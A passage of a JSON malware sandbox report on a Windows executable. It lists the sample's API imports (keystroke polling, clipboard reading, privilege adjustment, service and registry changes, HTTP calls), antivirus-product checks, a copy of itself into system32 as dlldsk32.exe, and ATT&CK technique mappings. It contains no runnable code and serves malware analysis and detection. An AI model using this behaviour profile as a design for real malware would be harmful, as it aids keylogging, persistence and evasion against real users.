\"QueryServiceStatus\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumDependentServicesA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"LookupPrivilegeValueA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"AdjustTokenPrivileges\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetUserNameA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenEventLogA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseEventLog\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenSCManagerA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenServiceA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseServiceHandle\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteService\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClipboardData\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenClipboard\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowTextA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetAsyncKeyState\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseClipboard\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClassNameA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"PostMessageA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumChildWindows\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindowVisible\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumWindows\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitWindowsEx\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetConnectA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCrackUrlA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WSASocketA\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"WSAIoctl\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005072.00000000.139289.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-242", "type": 2, "relevance": 1, "name": "Contains ability to close a handle to a service (API string)", "description": "Found reference to API \"CloseServiceHandle\" (Indicator: \"CloseServiceHandle\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"CloseServiceHandle\" (Indicator: \"CloseServiceHandle\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-191", "type": 2, "relevance": 1, "name": "Able to enumerate service (API string)", "description": "Found reference to API \"QueryServiceStatus\" (Indicator: \"QueryServiceStatus\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"OpenSCManagerA\" (Indicator: \"OpenSCManager\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"EnumDependentServicesA\" (Indicator: \"EnumDependentServices\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"QueryServiceStatus\" (Indicator: \"QueryServiceStatus\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"EnumDependentServicesA\" (Indicator: \"EnumDependentServices\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"OpenSCManagerA\" (Indicator: \"OpenSCManager\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-161", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/modify process thread (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2767.bat\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"CopyFileA\" to copy C:\\0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe to new location %WINDIR%\\system32\\dlldsk32.exe (UID: 00000000-00004816)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Aeb-75\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Aeb-75\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-8", "type": 2, "relevance": 2, "name": "Possibly checks for the presence of an Antivirus engine", "description": "\"McShield.exe\" (Indicator: \"mcshield.exe\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"zonealarm.exe\" (Indicator: \"zonealarm\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"NAVSCAN32.exe\" (Indicator: \"scan32.exe\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"KasperskyAVEng\" (Indicator: \"kaspersky\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"KasperskyAv\" (Indicator: \"kaspersky\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Antivirus\" (Indicator: \"antivirus\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"ZoneAlarm Pro\" (Indicator: \"zonealarm\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"ZoneAlarm\" (Indicator: \"zonealarm\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Nod32CC\" (Indicator: \"nod32\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"bitdefenderlive\" (Indicator: \"bitdefender\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Avast32\" (Indicator: \"avast\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"www.bitdefender.com\" (Indicator: \"bitdefender\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"www.trendmicro.com\" (Indicator: \"trendmicro\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"trendmicro.com\" (Indicator: \"trendmicro\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"www.kaspersky.com\" (Indicator: \"kaspersky\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"kaspersky.com\" (Indicator: \"kaspersky\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"www.f-secure.com\" (Indicator: \"f-secure\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"f-secure.com\" (Indicator: \"f-secure\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"sophos.com\" (Indicator: \"sophos\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"mcafee.com\" (Indicator: \"mcafee\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"symantec.com\" (Indicator: \"symantec\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"www.symantec.com\" (Indicator: \"symantec\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"AntiVirusOverride\" (Indicator: \"antivirus\") in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16", "origin": "File/Memory", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"%WINDIR%\\system32\\dlldsk32.exe\" [Source: 00000000-00004816-00000C39-3310943490]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/4.0 (compatible)\" (Indicator: \"mozilla/4.0 (\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string \"Mozilla/4.0 (compatible)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00004816.00000000.139125.001D0000.00000004.mdmp, 00000000-00004816.00000000.139125.0041B000.00000080.mdmp, 00000000-00004816.00000001.139308.001D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedState (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedStateEx (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004816)\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004816)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005072)\n \"dlldsk32.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005072)\n \"dlldsk32.exe\" called 